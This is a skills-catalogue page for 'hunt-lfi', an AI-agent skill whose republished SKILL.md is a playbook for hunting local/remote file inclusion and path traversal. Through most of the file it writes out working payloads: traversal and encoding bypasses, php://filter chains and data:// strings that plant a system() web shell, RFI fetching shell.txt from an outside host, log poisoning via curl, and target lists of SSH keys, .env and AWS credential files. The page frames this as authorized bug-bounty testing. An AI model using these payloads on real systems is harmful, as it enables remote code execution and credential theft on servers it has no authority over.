Configuring Horizon
coollabsio/coolify
A skill your agent uses whenever the user mentions Horizon by name in a Laravel context.
Hunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal
The automated check flagged lines worth reading first. See the safety section below.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-lfi --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-lfi .claude/skills/hunt-lfi && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "hunt-lfi" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-lfi into .claude/skills/hunt-lfi/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-lfi", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-lfiType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-lfi --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/hunt-lfi .agents/skills/hunt-lfi && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "hunt-lfi" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-lfi into .agents/skills/hunt-lfi/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-lfi", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-lfi --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/hunt-lfi .cursor/skills/hunt-lfi && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "hunt-lfi" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-lfi into .cursor/skills/hunt-lfi/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-lfi", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/sickn33/agentic-awesome-skills.git --path skills/hunt-lfi--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-lfi --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/hunt-lfi .gemini/skills/hunt-lfi && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "hunt-lfi" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-lfi into .gemini/skills/hunt-lfi/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-lfi", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install sickn33/agentic-awesome-skills hunt-lfiInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/hunt-lfi .github/skills/hunt-lfi && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "hunt-lfi" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-lfi into .github/skills/hunt-lfi/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-lfi", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install sickn33/agentic-awesome-skills hunt-lfi --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/hunt-lfi .opencode/skills/hunt-lfi && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "hunt-lfi" agent skill from https://github.com/sickn33/agentic-awesome-skills/tree/main/skills/hunt-lfi into .opencode/skills/hunt-lfi/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-lfi", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
hunt-lfiHunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal
Hunt Lfi is an agent skill from sickn33/agentic-awesome-skills. Hunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal
Its SKILL.md is about 4.7k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts. Compatibility notes: Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not…
It works with PHP. The repository describes itself as: AAS Core is the local, agent-first control plane for complete catalog discovery, agent-owned selection, stack validation, and planning, backed by 2,400+ agentic skills. Includes… The licence is MIT.
9 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit b84d35a. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curlpython3From the folder's file list and the shell code blocks in SKILL.md.
Hosts in commands or code, which the agent is likely to contact:
github.comFrom URLs in SKILL.md, links to its own repository left out.
Names these keys or tokens, usually read from environment variables:
SECRET_KEYFrom names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.
From compatibility in the SKILL.md frontmatter.
Hunt Lfi loads about 4.7k tokens when it runs. Until then it costs about 22 tokens; SKILL.md has 1,650 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found patterns that need a careful read before installing.
e-read is High when it exposes secrets (`.env`, `wp-config.php`, private keys, cloud creds), Medium when it only reads n/var/www/html/.env /var/www/html/config.php /var/www/html/wp-config.php/home/*/.ssh/id_rsa /root/.ssh/id_rsa /root/.bash_history/proc/self/environ ~/.aws/credentials ~/.docker/config.json /run/secrets/*| File read | `.env` / `config.php` / `wp-config.php` | DB creds, API keys → backend takeover || File read | `/proc/self/environ`, `~/.aws/credentials` | env secrets, cloud keys → SSRF/IAM pivot |Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from sickn33/agentic-awesome-skills at commit b84d35a, republished under its MIT licence (© sickn33). 1,650 words, ~4,741 tokens.
.claude/skills/hunt-lfi/SKILL.md (or your agent's skills folder).⚠️ AUTHORIZED USE ONLY This skill is for educational purposes or authorized security assessments only. You must have explicit, written permission from the system owner before using this tool. Misuse of this tool is illegal and strictly prohibited.
Mandatory confirmation gate Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:
- Ask the user to state the exact target URL, IP, account, or resource.
- Ask the user to confirm written authorization and the permitted scope.
- Show the exact command(s) and explain their expected effect.
- Wait for explicit confirmation in the current conversation.
Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.
LFI that reaches code execution is Critical. Pure file-read is High when it exposes secrets (.env, wp-config.php, private keys, cloud creds), Medium when it only reads non-sensitive files.
Highest-value chains (in rough order of reliability in 2026):
php://filter file-read primitive is upgraded to RCE with no upload endpoint and no writable file by chaining iconv conversions to forge an arbitrary PHP payload in-memory (Synacktiv, 2022). See the dedicated section below. This is the single most impactful thing to try and the most-missed.open_basedir and unreadable log perms, so verify the log is readable first.php://filter/convert.base64-encode/resource=index.php leaks source; read source to find more LFI sinks, secrets, and the include base path.allow_url_include=On, ?file=http://OOB/shell.txt pulls and executes remote code. Rare on modern configs but trivially Critical when present.LFI is frequently blind: the included content is parsed/executed but never reflected, or the page swallows the file into a template you can't see. Do not claim LFI from indirect signals alone.
../../etc/passwd vs a normal value. The app may be string-matching ../ and returning a canned 403/500 without ever touching the filesystem.failed to open '/var/www/../../etc/passwd'). That is the path formatter, not proof the file was read. A genuine read shows file contents, not your path.root:x:0:0: line, real PHP source after base64-decoding the filter output).expect:// / wrapper that triggers an outbound request. A unique-per-sink Collaborator hit (DNS + HTTP, with the server's source IP) proves the include ran./etc/passwd) vs one that does not (/etc/passwd_nope_<rand>). Stable, repeatable response-length or latency delta = real filesystem access. Confirm with a third known-good path to rule out coincidence./etc/passwd → grep ^root:). For blind, use a php://filter base64 read and decode — partial/truncated base64 still decodes to recognizable source.lfi-page.<collab>, lfi-tpl.<collab>) so callbacks identify which parameter fired.?page= ?file= ?path= ?template= ?view= ?lang= ?module=
?include= ?doc= ?load= ?read= ?content= ?theme= ?layout=
?component= ?download= ?img= ?pdf= ?report= ?style= ?dir=
JSON bodies: {"filename":...} {"template":...} {"path":...}| Signal | Vector |
|---|---|
PHP (X-Powered-By, .php, PHPSESSID) | php:// filter-chain RCE, phar://, zip://, data:// |
| Apache/Nginx logs readable | Log poisoning → RCE (verify readability first) |
Apache 2.4.49 / 2.4.50 (Server: banner) | CVE-2021-41773 / CVE-2021-42013 traversal → RCE |
PHP-CGI on Windows (XAMPP, php-cgi.exe) | CVE-2024-4577 arg-injection → RCE |
Java servlet (/WEB-INF/) | WEB-INF/web.xml, classes/, application.properties |
| Python Flask/Django | /proc/self/environ, settings.py, SECRET_KEY |
Node.js file-serve / res.sendFile, express.static | path-traversal read, require() traversal |
| Windows IIS / .NET | ..\..\web.config, C:\Windows\win.ini, machineKey |
cat recon/$TARGET/urls.txt | gf lfi > recon/$TARGET/lfi-candidates.txt
grep -E "(\?|&)(page|file|path|template|view|lang|module|include|doc|load|read|content|download|img|pdf|report|dir)=" \
recon/$TARGET/urls.txt
ffuf -u "https://$TARGET/FUZZ" -w ~/wordlists/lfi-paths.txt -mc 200,301,302?file=../../../etc/passwd
?file=....//....//....//etc/passwd # ../ stripping once → ....// survives
?file=..%2f..%2f..%2fetc%2fpasswd # single URL-encode
?file=..%252f..%252f..%252fetc%252fpasswd # double encode (decoded twice server-side)
?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd # encode dots too
?file=/etc/passwd%00.png # null byte — PHP < 5.3.4 only
?file=....\/....\/etc\/passwd # mixed slash
# Prefix-forced base (app prepends /var/www/): pad with extra ../, or absolute path if no prefix
# UTF-8 overlong: %c0%ae%c0%ae%2f (legacy servers)# Windows
?file=..\..\..\windows\win.ini
?file=..%5c..%5c..%5cwindows%5cwin.ini
?file=C:\inetpub\wwwroot\web.config?file=php://filter/convert.base64-encode/resource=index.php # decode base64 → source
?file=php://filter/read=string.rot13/resource=config.php
?file=php://filter/convert.base64-encode/resource=../app/Config.php
# Always base64-encode source reads: raw <?php ... ?> is parsed/swallowed and you see nothing.The modern flagship technique (Synacktiv, 2022). If you have a php://-capable LFI that reads a file, you can also execute attacker-chosen PHP. iconv charset conversions, chained inside php://filter, emit controlled bytes that prepend to the resource until a full <?php ... ?> payload is forged — then include() runs it. No upload endpoint, no log access, no writable path required.
# Generate the chain (public tool, no CVE — it abuses documented iconv behaviour):
# git clone https://github.com/synacktiv/php_filter_chain_generator
python3 php_filter_chain_generator.py --chain '<?php system($_GET["c"]); ?>'
# Tool prints a long php://filter|convert.iconv.*|...|resource=php://temp string.
# Drop it into the sink:
?file=php://filter/convert.iconv.UTF8.CSISO2022KR|...<long-chain>...|convert.base64-decode/resource=php://temp&c=idNotes / gotchas:
php://filter scheme (most LFI sinks calling include/require/file_get_contents on the param do).<?=shorthand?>).<?php file_get_contents("http://x.<collab>/".id);?>) to confirm execution OOB.open_basedir). Try it whenever you have a php:// filter read.# data:// — executes inline; REQUIRES allow_url_include=On
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+&c=id # <?php system($_GET['c']);?>
# php://input — body is treated as the included resource; ALSO REQUIRES allow_url_include=On
# POST ?file=php://input body: <?php system($_GET['c']); ?>
# (Same prerequisite as data://. Do NOT assume this works on default PHP config.)
# expect:// — direct command exec; requires the (rare) expect extension loaded
?file=expect://idRFI = the include target is a remote URL. Prerequisite: allow_url_include=On (and allow_url_fopen=On). Off by default on modern PHP, but still seen on legacy/misconfigured hosts.
# Host a payload you control, then:
?file=http://OOB-HOST/shell.txt # shell.txt contains <?php system($_GET['c']); ?>
?file=https://OOB-HOST/shell.txt?
?file=ftp://OOB-HOST/shell.txt
# Detection without RCE: point at a Burp Collaborator HTTP URL. A callback (server IP) = the
# include fetched remotely → RFI confirmed even if execution is blocked. No callback = not RFI.
# Bypass appended extension (?file=$x.".php"): trailing ? or # to truncate, or ?file=http://OOB/shell# Step 1: inject PHP into a log the include can read
curl -s "https://$TARGET/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
# Step 2: include it (verify the log is readable first — read it plain before poisoning)
?file=../../../var/log/apache2/access.log&c=id
?file=../../../var/log/nginx/access.log&c=id
?file=/proc/self/fd/0&c=id # stdin fd (varies)
# Candidate logs: /var/log/apache2/access.log /var/log/httpd/access_log
# /var/log/nginx/access.log /var/log/auth.log (SSH user poisoning) /proc/self/environ# PHP session: set payload in a stored field (username/profile), then include the session file
?file=/var/lib/php/sessions/sess_<PHPSESSID>&c=id
?file=/tmp/sess_<PHPSESSID>&c=id
# phar:// object injection (needs an unserialize-on-metadata sink + any file upload):
?file=phar:///var/www/uploads/evil.jpg # JPEG magic bytes prepended to a PHAR
# zip:// — archive containing the target, or a symlink to /etc/passwd
?file=zip:///var/www/uploads/a.zip%23path/inside.txt?file= needed)Two LFI/traversal surfaces that are not query-parameter file reads:
../../ entry names or embedded symlinks (tar preserves them) to read/write outside the extraction dir. Craft an archive entry named ../../../etc/cron.d/x, or a symlink pointing at /etc/passwd; confirm by writing a unique canary outside the upload dir. Disclosed: reports/1439593, reports/733072, reports/822262.label:@/etc/passwd, or an MSL payload (<image xlink:href="msl:/etc/passwd">) plus msl:/ephemeral: pseudo-protocols (ImageTragick CVE-2016-3714 family). Disclosed: reports/1858574. Pairs with hunt-file-upload.ffuf -u "https://$TARGET/page.php?file=FUZZ" -w ~/wordlists/lfi.txt -mc all -fr "not found"
wfuzz -c -z file,/usr/share/wfuzz/wordlist/vulns/lfi.txt --hh <baseline-len> \
"https://$TARGET/page.php?file=FUZZ"
dotdotpwn -m http -h $TARGET -o unix
# Burp: Intruder over the bypass table; Collaborator for blind/RFI confirmation.Verified, correctly-attributed references for the patterns above:
php_filter_chain_generator. Not a CVE; an abuse of documented iconv behaviour. The reason a bare file-read upgrades to Critical.%2e in normalized path) → file read, and RCE when mod_cgi is enabled.%%32%65) → traversal/RCE.Grounding note: this skill is built from 31 disclosed LFI/path-traversal reports. When citing a specific HackerOne report in your write-up, link the exact report URL/ID you used — do not paraphrase a report ID from memory. A wrong ID is worse than none.
# Linux
/etc/passwd /etc/hosts /etc/shadow (rarely readable)
/proc/self/environ /proc/self/cmdline /proc/self/status
/var/www/html/.env /var/www/html/config.php /var/www/html/wp-config.php
/home/*/.ssh/id_rsa /root/.ssh/id_rsa /root/.bash_history
/var/www/html/app/config/parameters.yml # Symfony
.git/config .git/HEAD composer.json package.json
# App / cloud secrets
/proc/self/environ ~/.aws/credentials ~/.docker/config.json /run/secrets/*
# Windows / .NET
C:\Windows\win.ini C:\inetpub\wwwroot\web.config ..\..\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config| Filter | Bypass |
|---|---|
Strips ../ once | ....// or ..../\ (re-forms ../ after strip) |
| URL-decodes once | %252f (double-encode /), %252e for dots |
Decodes once, blocks .. | Encode dots: %2e%2e%2f / overlong %c0%ae (legacy) |
Appends .php to input | ? or # truncation; null byte %00 (PHP < 5.3.4) |
Blocks php:// scheme | try PHP://, pHp://, or data:// / expect:// |
| Prepends fixed base dir | enough ../ to escape; or absolute path if no base prepend |
Blocks /etc/passwd literal | path-truncation, /etc/./passwd, /etc//passwd |
| WAF on long filter-chains | move chain to POST body / minimize payload |
| Windows | ..\..\..\windows\win.ini, ..%5c..%5c |
| LFI primitive | Chain to | Impact |
|---|---|---|
php://filter read | filter-chain RCE (Phase 4) | RCE with no upload — Critical |
| File read | .env / config.php / wp-config.php | DB creds, API keys → backend takeover |
| File read | /proc/self/environ, ~/.aws/credentials | env secrets, cloud keys → SSRF/IAM pivot |
| Remote URL include | RFI (allow_url_include) | direct RCE — Critical |
| File read + upload | phar:// / log / session poison | RCE — Critical |
| Source disclosure | full app source | hardcoded secrets, new sinks, machineKey |
Direct-read proof (not a false positive):
/etc/passwd must contain a literal root:x:0:0:root:/root: line. Diff the response against a known-good param value — the delta must be the file body, not a WAF/error page./etc/passwd and /etc/passwd_<rand> (non-existent) — only the real file returns content.Blind / OOB proof:
Partial / truncated reads:
php://filter/convert.base64-encode so even a truncated read decodes to recognizable bytes; report exactly what you recovered, not what you assume is there.RCE proof: show command output you control — id / whoami / hostname reflected, or an OOB callback from inside the executed payload (curl http://<collab>/). "The payload was accepted" is not RCE.
Severity:
triage-validation) before reporting; report via report-writing. Prefer a sandbox, disposable VM, or controlled lab.# Read-only first step; confirm scope before anything active.
cat scope.txt # target list from the authorized engagement briefAdapted from elementalsouls/Claude-BugHunter (MIT); frontmatter, When to Use/Limitations, and safety boundaries added for upstream compliance. Docs-only import: executable helpers, commands, engine, and research assets not bundled.
© sickn33, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/hunt-lfi of sickn33/agentic-awesome-skills.
Open the folder on GitHubat commit b84d35a
We found 5 copies of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in sickn33/agentic-awesome-skills, which our catalogue first saw on October 7, 2026.
Hunt Lfi next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Hunt Lfi this skillsickn33/agentic-awesome-skills | 47k | 1 repos | ~4.7k | Automated safety check: Warn | MIT | |
| Configuring Horizoncoollabsio/coolify | 63k | 4 repos | ~898 | Automated safety check: Pass | MIT | |
| Tailwindcss Developmentanonaddy/anonaddy | 4.9k | 10 repos | ~865 | Automated safety check: Pass | MIT | |
| Fortify Developmentcoollabsio/coolify | 63k | 4 repos | ~1.9k | Automated safety check: Pass | MIT | |
| MCP Developmentcoollabsio/coolify | 63k | 1 repos | ~949 | Automated safety check: Pass | MIT | |
| WooCommerce Code Reviewwoocommerce/woocommerce | 11k | 3 repos | ~1.1k | Automated safety check: Pass | Custom licence |
coollabsio/coolify
A skill your agent uses whenever the user mentions Horizon by name in a Laravel context.
anonaddy/anonaddy
Always invoke when the user's message includes 'tailwind' in any form.
coollabsio/coolify
ACTIVATE when the user works on authentication in Laravel. An agent skill from coollabsio/coolify.
coollabsio/coolify
A skill your agent uses for Laravel MCP development. An agent skill from coollabsio/coolify.
woocommerce/woocommerce
Reviews WooCommerce code changes against the project's standards, flagging backend PHP architecture, naming, documentation, data integrity and testing violations.
symfony/symfony
Synchronize translation catalogs across maintained Symfony branches: find messages that newer branches added to the English catalogs but that are still missing from the oldest maintained branch…
sickn33/agentic-awesome-skills
Implements an interface in one of two named color modes, iridescent white or colorful black, from a parameterized starter that reports measured color intensity.
sickn33/agentic-awesome-skills
Saves a user's project decisions, rules and preferences into a project-local mdbase so later sessions and other agents can recover the intent.
sickn33/agentic-awesome-skills
Keeps project decisions, research and verified results available across coding-agent sessions through LWC memory, a document Wiki graph and a CodeGraph code index.
sickn33/agentic-awesome-skills
Guides an agent through assessing its own owner for cofounder fit, publishing an approved profile, and ranking complementary profiles other agents published for their owners.
sickn33/agentic-awesome-skills
Integracao com WhatsApp Business Cloud API (Meta). An agent skill from sickn33/agentic-awesome-skills.
sickn33/agentic-awesome-skills
Acts as a proxy for the Cline CLI, dispatching coding tasks one at a time, monitoring runs by hard evidence, relaying decisions to you and learning per-project preferences.
Works with
Hunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal. Hunt Lfi is an agent skill from sickn33/agentic-awesome-skills.
Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a claude-code`. Or copy the skill folder (skills/hunt-lfi in sickn33/agentic-awesome-skills) into .claude/skills/hunt-lfi in your project. Claude Code loads it when a task matches its description.
Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a codex`. Or copy the skill folder (skills/hunt-lfi in sickn33/agentic-awesome-skills) into .agents/skills/hunt-lfi in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-lfi, .gemini/skills/hunt-lfi, .github/skills/hunt-lfi and .opencode/skills/hunt-lfi in your project.
Going by SKILL.md and its folder, Hunt Lfi needs the command-line tools its instructions call (curl and python3) and credentials named SECRET_KEY. Our summary lists: Python 3; Node.js; A credential in SECRET_KEY. Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled..
SKILL.md names 1 domain. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. This is read from the text; nothing was executed.
Our automated static check of SKILL.md flagged 3 warning(s): mentions a credentials file (ssh keys, cloud or package-manager tokens). Read the flagged lines before installing; the check is not a guarantee either way.
Hunt Lfi is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.
About 4.7k tokens (SKILL.md is roughly 19k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Hunt Lfi: Configuring Horizon (coollabsio/coolify, 63k stars), Tailwindcss Development (anonaddy/anonaddy, 4.9k stars), Fortify Development (coollabsio/coolify, 63k stars) and MCP Development (coollabsio/coolify, 63k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
sickn33 (a GitHub user) maintains it in sickn33/agentic-awesome-skills, which has 47,405 GitHub stars. The repository holds 1,497 skills in this directory. The repository was last updated on October 9, 2026.
Source: sickn33/agentic-awesome-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.